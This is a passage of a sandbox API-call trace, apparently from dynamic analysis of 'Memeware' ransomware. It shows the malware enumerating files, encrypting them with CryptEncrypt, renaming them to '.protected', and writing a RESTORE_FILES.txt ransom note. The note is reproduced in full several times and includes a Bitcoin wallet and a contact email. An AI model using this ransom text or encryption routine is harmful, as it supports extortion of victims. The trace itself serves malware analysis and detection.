(lpString1=".", lpString2="System Volume Information") returned -1 [0074.011] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\.") returned 115 [0074.011] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.011] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.011] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.011] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.011] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.011] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.011] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.011] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\..") returned 116 [0074.011] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.011] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.011] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.011] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0074.011] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0074.011] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0074.011] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0074.012] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0074.012] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 122 [0074.012] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0074.012] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0074.012] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.012] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.012] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.014] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 122 [0074.014] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0074.014] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 122 [0074.014] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0074.014] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 122 [0074.014] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0074.014] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.042] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.042] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.042] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.042] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.095] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.095] CloseHandle (hObject=0xd8) returned 1 [0074.096] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected") returned 132 [0074.096] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab.protected")) returned 1 [0074.097] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.097] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Windows") returned -1 [0074.097] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Program Files") returned 1 [0074.097] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Program Files (x86)") returned 1 [0074.097] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="$Recycle.bin") returned 1 [0074.097] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="System Volume Information") returned 1 [0074.097] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 139 [0074.097] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".protected") returned 0x0 [0074.097] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="RESTORE_FILES.txt") returned 1 [0074.097] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.097] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.097] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.097] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 139 [0074.097] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".txt") returned 0x0 [0074.097] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 139 [0074.097] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".rar") returned 0x0 [0074.097] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 139 [0074.097] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".zip") returned 0x0 [0074.098] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.116] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.116] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.117] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.117] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.118] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.118] CloseHandle (hObject=0xd8) returned 1 [0074.179] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected") returned 149 [0074.179] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.protected")) returned 1 [0074.180] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0074.180] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0074.180] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 131 [0074.180] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0074.185] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.185] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0074.186] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.186] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0074.186] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.186] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0074.186] CloseHandle (hObject=0xd4) returned 1 [0074.187] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0074.187] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0074.187] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 110 [0074.187] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0074.188] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.188] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0074.189] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.189] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0074.189] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.189] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0074.189] CloseHandle (hObject=0xb4) returned 1 [0074.189] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0074.189] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0074.190] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\RESTORE_FILES.txt") returned 101 [0074.190] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0074.192] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.192] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0074.193] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.193] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0074.193] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.193] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0074.193] CloseHandle (hObject=0xa4) returned 1 [0074.193] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0074.193] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="Windows") returned -1 [0074.193] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="Program Files") returned -1 [0074.193] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="Program Files (x86)") returned -1 [0074.193] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="$Recycle.bin") returned 1 [0074.193] lstrcmpiW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="System Volume Information") returned -1 [0074.193] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned 83 [0074.193] lstrcmpW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2=".") returned 1 [0074.193] lstrcmpW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="..") returned 1 [0074.194] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*") returned 85 [0074.194] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0074.195] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.195] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.195] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.195] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.195] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.195] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\.") returned 85 [0074.195] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.195] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 